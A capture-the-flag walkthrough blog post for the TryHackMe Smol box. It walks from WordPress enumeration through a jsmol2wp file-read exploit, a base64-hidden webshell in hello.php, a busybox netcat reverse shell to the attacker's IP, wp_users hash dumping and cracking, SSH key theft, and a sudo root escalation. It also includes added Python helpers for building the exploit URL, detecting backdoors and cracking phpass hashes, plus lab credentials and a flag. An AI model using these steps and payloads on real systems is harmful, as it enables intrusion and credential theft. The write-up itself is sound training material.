TryHackMe Smol Walkthrough: Step-by-Step Guide to Exploitation & Privilege Escalation
Cybrpunked


Publish Date: Mar 14

Bonjour Hunters! ▄︻デ══━一💥

They say size doesn’t matter — and the Smol machine on TryHackMe proves just that! Don’t let the name fool you; this box packs a punch with tricky exploits, enumeration & privilege escalation techniques.

Smol | Credit: TryHackMe

In this write-up, I’ll walk you through the full hacking process, from enumeration to root access, while sharing insights along the way.

Let’s dive in and pwn Smol like a pro! 🚀

To reach the site by the hostname it expects, add the machine's IP to /etc/hosts. The file is root-owned, so a plain `>>` redirect from an unprivileged shell fails; write through sudo instead:

echo "<ip>  www.smol.thm smol.thm" | sudo tee -a /etc/hosts

Then browse to http://www.smol.thm, which lands on the page below👇:

Smol home web page

The first thing to do is read the page source. Nothing unusual there.

Next I tried ffuf for subdomain fuzzing and nmap for port scanning, but nothing unusual turned up there either.

💡 Then my brain gave me a kick on what to do next…

As the site runs WordPress, let's simply enumerate it with WPScan.

🔎 If you're new to WPScan and want to learn how to use it, read this first: Learn about WPScan Command Line Usage to understand WordPress vulns

Hit the keyboard with the following command:

wpscan --url www.smol.thm --enumerate ap,t,u

ap: enumerate all known plugins, not just the ones WPScan already has vulnerabilities for
t: enumerate popular themes
u: enumerate usernames (user IDs 1 to 10 by default)

wpscan

Once the scan finishes, read through the output carefully.

𖥠 While looking through it, one name among the plugins caught my eye!

jsmol2wp plugin

I was suspicious about our little guy- jsmol2wp. So I looked through the internet and YES it is vulnerable!

And wow! We have also gathered a list of users.
Save all of this (plugin names and versions, and the usernames) to a file; the usernames come back into play later.

Since the plugin is known to be vulnerable, let's start with it and do a bit of research on Google first.

After a few minutes⏱️ of research, I came across this advisory:
https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
It covers two bugs in jsmol2wp: CVE-2018-20463, an arbitrary file read through the query parameter, and CVE-2018-20462, a reflected XSS. The file read is the one we want, and the PoC section gives us the request. Let's try it…

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php
?isform=true
&call=getRawDataFromDatabase
&query=php://filter/resource=../../../../wp-config.php

The getRawDataFromDatabase call hands whatever is in query straight to a file read with no restriction on the path, so the php://filter wrapper plus ../ traversal returns any file the web server can read, including wp-config.php four directories up from the plugin's php/ folder.

Got it!
The page returns the raw contents of wp-config.php…

…and in it are the database username and password. Great!

wp-config.php page
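To make the two steps above repeatable, here is a small Python helper I added for this write-up; it is not code from the original post, the advisory or the plugin. It builds the traversal URL in the shape the advisory's PoC uses and then pulls the `define(...)` values out of a returned wp-config.php. The function names (`build_lfi_url`, `parse_wp_config`, `audit_wp_config`) are my own, the `depth` default assumes the standard layout where the plugin's php/ directory sits four levels below the WordPress root, and the sample config text is constructed here using the DB username and password shown later in this post.

```python
"""Build the jsmol2wp php://filter read URL and extract secrets from wp-config.php.

Added example for this write-up; not the advisory's or the plugin's own code.
"""
import re
from urllib.parse import urlencode

# Vulnerable handler path from the CVE-2018-20463 advisory.
JSMOL_ENDPOINT = "/wp-content/plugins/jsmol2wp/php/jsmol.php"

# WordPress secret keys/salts that wp-config.php should define with random values.
SECRET_KEYS = (
    "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT",
)
PLACEHOLDER = "put your unique phrase here"  # default text from wp-config-sample.php

# Matches define( 'NAME', 'value' ); with either quote style.
DEFINE_RE = re.compile(r"""define\(\s*['"]([A-Za-z_]+)['"]\s*,\s*['"](.*?)['"]\s*\)\s*;""")


def build_lfi_url(base: str, target: str, depth: int = 4) -> str:
    """URL that makes getRawDataFromDatabase read `target` (relative to the WP root).

    jsmol.php lives in wp-content/plugins/jsmol2wp/php/, four directories below
    the WordPress root, so four '../' climb back up to it (assumed standard layout).
    """
    query = {
        "isform": "true",
        "call": "getRawDataFromDatabase",
        "query": "php://filter/resource=" + "../" * depth + target.lstrip("/"),
    }
    # Keep '/', ':' and '=' literal so the URL matches the advisory's PoC shape.
    return base.rstrip("/") + JSMOL_ENDPOINT + "?" + urlencode(query, safe="/:=")


def parse_wp_config(source: str) -> dict:
    """Return {constant: value} for every define() in a wp-config.php body."""
    return dict(DEFINE_RE.findall(source))


def audit_wp_config(cfg: dict) -> list:
    """Turn a parsed config into the findings a report would list."""
    findings = []
    if cfg.get("DB_PASSWORD"):
        findings.append(
            "database credentials exposed: "
            f"{cfg.get('DB_USER', '?')}:{cfg['DB_PASSWORD']}@{cfg.get('DB_HOST', 'localhost')}"
        )
    # WordPress treats placeholder keys as unset; flag them as a hardening gap.
    weak = [k for k in SECRET_KEYS if cfg.get(k, PLACEHOLDER) == PLACEHOLDER]
    if weak:
        findings.append("placeholder or missing secret keys: " + ", ".join(weak))
    return findings


# Constructed sample standing in for the file the LFI returns on this box
# (DB_USER/DB_PASSWORD are the values shown later in the write-up).
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define( 'DB_COLLATE', '' );
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );
$table_prefix = 'wp_';
"""

if __name__ == "__main__":
    print(build_lfi_url("http://www.smol.thm", "wp-config.php"))
    cfg = parse_wp_config(SAMPLE_WP_CONFIG)
    for line in audit_wp_config(cfg):
        print("[!]", line)
```

Feed the output of a real request (curl the URL and save the body) into `parse_wp_config` instead of the constructed sample and you get the same findings for the live target; the audit function is also a quick check to run on your own wp-config.php.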

Let's head to http://www.smol.thm/wp-admin
and try those database credentials against the WordPress login. Password reuse between the database and a WordPress account is a classic finding, and here it pays off.

wp-user login

✅We are logged in.

Now, its time for us to roam around and see what we find.

Browsing the dashboard section by section, the Pages menu stands out. Under it we see this:

Page section

The author is 'admin', and opening 'Webmaster Tasks!!' shows this:

Webmaster Tasks!!

It says to check the code of the Hello Dolly plugin. That is the sample plugin WordPress ships by default, and a quick look at its GitHub mirror confirms it lives in a single file named hello.php.

Plugins sit under /wp-content/plugins/, the same tree the vulnerable jsmol2wp file lives in:

/wp-content/plugins/jsmol2wp/php/jsmol.php

So we reuse the file-read bug, this time pointing it at the plugin file. After several paths that failed, this is the one that worked 👇:

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php
?isform=true
&call=getRawDataFromDatabase
&query=php://filter/resource=../../../../wp-content/plugins/hello.php

And yes, we caught the page in our hands!

hello.php page

Scrolling through the file, there's a long base64-looking string embedded in the code:

hash value

Let's paste it into CyberChef and see what it is.

With the blob in the input, click the magic wand next to the output (the Magic operation). It detects the base64 encoding and decodes it:

cyberchef output

This is a backdoor planted in the plugin: the decoded PHP reads the 'cmd' parameter from $_GET and executes it as a system command, as in

$_GET["cmd"]

Aight!

Hello Dolly hooks into every admin page load, so the backdoor fires on any wp-admin URL as long as we are logged in. Change the URL to

http://www.smol.thm/wp-admin/edit.php?cmd=whoami

and the command output is rendered on the page:

command output on page reflects
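For the blue-team side of this step, here is an added example (mine, not code from the room, from WordPress or from Hello Dolly) that does what CyberChef did by hand: it scans PHP plugin source for eval(base64_decode(...)), decodes each payload and reports which request parameters reach which command-execution sinks. It goes one step beyond the page by also resolving the octal/hex escapes PHP allows inside double-quoted strings, since backdoors often spell parameter names that way to defeat a plain grep for "cmd". The sample hello.php fragments are constructed here (the blobs are built at runtime so they are exact), and the function names are my own.

```python
"""Find eval(base64_decode('...')) backdoors in PHP plugin source and explain them.

Added example for this write-up; not code from WordPress, Hello Dolly or the room.
"""
import base64
import re

# eval(base64_decode('<blob>')) with optional whitespace and either quote style.
EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)"""
)
# $_GET["name"] / $_POST['name'] etc.; the name may contain PHP escapes (see _unescape_php).
INPUT_RE = re.compile(r"""\$_(GET|POST|REQUEST|COOKIE)\[\s*(['"])(.+?)\2\s*\]""")
# Functions that hand a string to the OS. Any of these fed from $_GET is a webshell.
EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")


def _unescape_php(s: str) -> str:
    """Resolve \\xhh (hex) and \\ooo (octal) escapes PHP accepts in double-quoted strings."""
    s = re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), s)


def decode_payloads(source: str) -> list:
    """Return the decoded PHP hidden inside every eval(base64_decode(...)) call."""
    payloads = []
    for blob in EVAL_B64_RE.findall(source):
        raw = base64.b64decode(re.sub(r"\s+", "", blob))
        payloads.append(raw.decode("utf-8", errors="replace"))
    return payloads


def analyse_plugin(source: str) -> list:
    """One finding per hidden payload: which request parameters reach which exec sinks."""
    findings = []
    for payload in decode_payloads(source):
        params = sorted({(src, _unescape_php(name)) for src, _q, name in INPUT_RE.findall(payload)})
        sinks = [f for f in EXEC_FUNCS if re.search(rf"\b{f}\s*\(", payload)]
        findings.append({"payload": payload, "params": params, "sinks": sinks})
    return findings


# Constructed hello.php fragments (not the real file from the box). The second one
# spells "cmd" with escapes, so a plain text search for cmd would miss it.
_PLAIN = 'if (isset($_GET["cmd"])) { system($_GET["cmd"]); }'
_OBFUSCATED = r'if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }'


def _wrap(payload: str) -> str:
    """Embed a payload the way a trojaned Hello Dolly would carry it."""
    blob = base64.b64encode(payload.encode()).decode()
    return (
        "<?php\nfunction hello_dolly_get_lyric() {\n"
        f"    eval(base64_decode('{blob}'));\n"
        "    $lyrics = \"Hello, Dolly\";\n    return $lyrics;\n}\n"
    )


SAMPLE_PLAIN = _wrap(_PLAIN)
SAMPLE_OBFUSCATED = _wrap(_OBFUSCATED)

if __name__ == "__main__":
    for name, src in (("plain", SAMPLE_PLAIN), ("obfuscated", SAMPLE_OBFUSCATED)):
        for finding in analyse_plugin(src):
            print(name, finding["params"], finding["sinks"])
            print("   ", finding["payload"])
```

Point `analyse_plugin` at the real hello.php you pulled with the file-read bug (or at every file under wp-content/plugins/ on a box you are cleaning up) and anything with a $_GET parameter feeding system() is your webshell.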

Well well well gang!

Let’s teach this machine to talk back 😉

Head to revshells.com, pick the 'busybox nc -e' payload and fill in your attacking IP and port.

Start the listener in your terminal:

nc -lvnp 9001

Now take the reverse shell one-liner:

busybox nc <ip> 9001 -e sh

and pass it as the cmd parameter (the browser percent-encodes the spaces for you; if you use curl instead, quote the URL and write them as %20). Remember the request has to carry your logged-in WordPress session, since the backdoor only runs on admin pages. Hit enter and wait for the callback 📞:

http://www.smol.thm/wp-admin/edit.php?cmd=busybox nc <ip> 9001 -e sh

Shell acquired

🔑 Shell secured — time to explore the loot!

Stabilizing the shell first. The Ctrl+Z step matters: it backgrounds the shell so stty can be applied to your local terminal before fg brings it back.

python3 -c 'import pty;pty.spawn("/bin/bash")'
(press Ctrl+Z)
stty raw -echo;fg
export TERM=xterm

So, what do we have in here…

Looking around as www-data turns up nothing useful on the filesystem.

Then I remembered the database credentials we saw in wp-config.php. Let's try them against the local MySQL server:

mysql -u wpuser -p

Enter the DB password from wp-config.php (the same one we used for the WordPress login):
kbLSF2Vop#lw3rjDZ629*Z%G

MYSQL

Bam, it worked!

Then list the databases:

show databases;

database

We are after the WordPress users' passwords, so select that database and list its tables:

use wordpress;
show tables;

This displays the tables in the wordpress database.
We want the users' password hashes, and 'wp_users' is where WordPress keeps them:

select * from wp_users;

user hashes

🔐 Here are the password hashes of every WordPress user. Copy them into a hash.txt file, one per line. Saving them as login:hash (or selecting only user_login and user_pass) lets John print the username next to each cracked password.

Let's crack them with John the Ripper:

john hash.txt --format=phpass --wordlist=/usr/share/wordlists/rockyou.txt

phpass is the Portable PHP password hashing framework WordPress uses for user passwords; it is the $P$ prefix you see in wp_users. Under the hood it is salted MD5 iterated a few thousand times, which is why a wordlist attack is practical.
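The phpass format deserves a closer look, so here is an added example (my own code, not the author's and not John's) that re-implements the portable phpass scheme in pure Python and uses it to verify and crack $P$ hashes the way `--format=phpass` does. The wp_users rows and wordlist are constructed here (the salts are made up; diego's password is the one recovered in the write-up), and the one external value is the known-good test vector published with phpass itself. WordPress stores its hashes with cost character 'B', meaning 2^13 = 8192 MD5 rounds, which is what `phpass_hash` defaults to.

```python
"""Verify and crack WordPress phpass ($P$) hashes in pure Python.

Added example for this write-up; it re-implements the portable phpass scheme
so you can see what John is doing with --format=phpass. Not code from the box.
"""
import hashlib
import hmac

# phpass's own base64 alphabet (not the RFC one).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass encode64(): 3 bytes -> 4 chars, little-endian bit packing, no padding."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def _crypt_private(password: str, setting: str) -> str:
    """Recompute the hash for `password` under the salt/cost in `setting` (first 12 chars)."""
    if setting[:3] not in ("$P$", "$H$"):          # $H$ is the phpBB spelling of the same scheme
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.find(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("bad cost character")
    salt = setting[4:12]
    if len(salt) != 8:
        raise ValueError("bad salt")
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):               # 2**count_log2 further MD5 rounds
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_hash(password: str, salt: str, count_log2: int = 13) -> str:
    """Make a $P$ hash. WordPress writes cost 'B' (count_log2 = 13); salt is 8 itoa64 chars."""
    return _crypt_private(password, "$P$" + ITOA64[count_log2] + salt)


def phpass_verify(password: str, stored: str) -> bool:
    """True if `password` produces `stored`; the final compare is constant-time."""
    if len(stored) != 34:
        return False
    try:
        return hmac.compare_digest(_crypt_private(password, stored), stored)
    except ValueError:
        return False


def crack_wp_users(rows, wordlist) -> dict:
    """rows: (user_login, user_pass) pairs as dumped from wp_users. Returns login -> password."""
    cracked = {}
    for login, stored in rows:
        for word in wordlist:
            if phpass_verify(word, stored):
                cracked[login] = word
                break
    return cracked


# Known-good vector shipped in phpass's own test.php: 'test12345' at cost '9' (2**11 rounds).
KNOWN_HASH = "$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0"

# Constructed wp_users rows: fixed salts so the sample is reproducible.
SAMPLE_ROWS = [
    ("diego", phpass_hash("sandiegocalifornia", "u2rPq9Zx")),
    ("admin", phpass_hash("not-in-the-wordlist", "Kd4Lm0Wv")),
]
SAMPLE_WORDLIST = ["123456", "password", "sandiegocalifornia", "letmein"]

if __name__ == "__main__":
    print(phpass_verify("test12345", KNOWN_HASH))
    print(crack_wp_users(SAMPLE_ROWS, SAMPLE_WORDLIST))
```

Swap `SAMPLE_ROWS` for the real `select user_login, user_pass from wp_users;` output and `SAMPLE_WORDLIST` for rockyou.txt and this is a (slow, single-threaded) John. The takeaway for defenders is the cost: 8192 MD5s per guess is nothing for a GPU, so a WordPress install that still writes $P$ hashes is only as safe as its users' passwords.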

After a while of waiting, with my poor CPU cores at full load:

core usage

John prints the cracked password:

Image description

Now compare this with the users WPScan enumerated earlier:

Image description

The password sandiegocalifornia clearly pairs with the user diego, so let's switch to that account:

Image description

1337! We're in as diego.

Note that this step is horizontal privilege escalation: we moved from the web server's account to another unprivileged user, not to root.
After cd-ing into /home/diego:

WE GOT OUR FIRST FLAG! 🚩

FLAG

Hotsy-totsy!

From diego we can also look into
/home/gege &
/home/think.

cd /home/gege
ls -la

There's a 'wordpress.old.zip' file, but diego has no read access to it, so unzip fails.

Let's see what's available in /home/think:

cd /home/think
ls -la

Good, something stands out here:

Image description

cd .ssh
ls -la

Image description

cat id_rsa

Great, a private key!!
Copy it to the attacking machine, save it as id_rsa and restrict its permissions with chmod 600 (ssh refuses to use a key other users can read). Then log in as think:

ssh think@www.smol.thm -i id_rsa

That gives us a proper shell as think.

Checking /home/gege again:

cd /home/gege
ls -la

The archive is still not readable by think either:

Image description

Aight! Now switch to gege:

su gege

From gege, start a web server in /home/gege so we can pull the archive to our machine and run zip2john on it. Anyone who can reach the box on that port can fetch the file too, so stop the server as soon as the download is done.

python3 -m http.server 8080

Browse to http://<ip>:8080 (the target's IP) and you would see

Image description

click on it to download.

Once it's downloaded, open a terminal in the download directory and run:

zip2john wordpress.old.zip > wphash

This is quick and produces a file named wphash holding the archive's password hash; cat-ing it looks like this:

Image description

Now, let's run The Ripper

John the ripper

john wphash --wordlist=/usr/share/wordlists/rockyou.txt

DARN IT!

That was quick!

Image description

Back in the gege session on the box, unzip the archive with the cracked password:

Image description

And

cd wordpress.old

Image description

LOOK!

Image description

The file we were hoping for: an old wp-config.php, the most dangerous thing in any WordPress backup.

And when we cat it:

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'xavi' );

/** Database password */
define( 'DB_PASSWORD', 'P@ssw0rdxavi@' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

We got xavi's password too: the old config's DB_PASSWORD is P@ssw0rdxavi@, and, as with wpuser, it is reused for the system account. Also worth noting: all eight authentication keys and salts are still the default placeholders from wp-config-sample.php, a sign this install was never hardened.

su xavi

Log in with the password obtained:
P@ssw0rdxavi@

Let's check xavi's sudo permissions (sudo -l):

Image description

💰 Root access, AMAZING!

Run the command below to get a root shell. A single sudo /bin/sh does the same thing; the doubled sudo is harmless but redundant.

sudo sudo /bin/sh

Then, from the root shell:

Image description

▄︻╦芫≡══ — HACKSTATIC!

ROOT FLAG CAPTURED:
bf89ea3ea01992353aef1f576214d4e4

Image description

🔍 Wrapping Up: Small Box, Big Lessons

The Smol machine might be tiny in name, but it packs a punch 💥 in teaching fundamental enumeration, privilege escalation, and shell exploitation techniques. This challenge reinforces the golden rule of penetration testing—never underestimate the "small" details 🧐, as they often hold the key 🔑 to unlocking the entire system.

Whether you're a beginner sharpening your recon skills 🛠️ or a seasoned hacker looking for a quick thrill 🎯, Smol proves that size doesn’t always matter—methodology does.

Until next time, keep hacking, keep learning 🧑‍💻, and remember: even the smallest misconfigurations can lead to the biggest vulnerabilities. ⚠️

Follow me on Medium for more content related to cybersecurity!
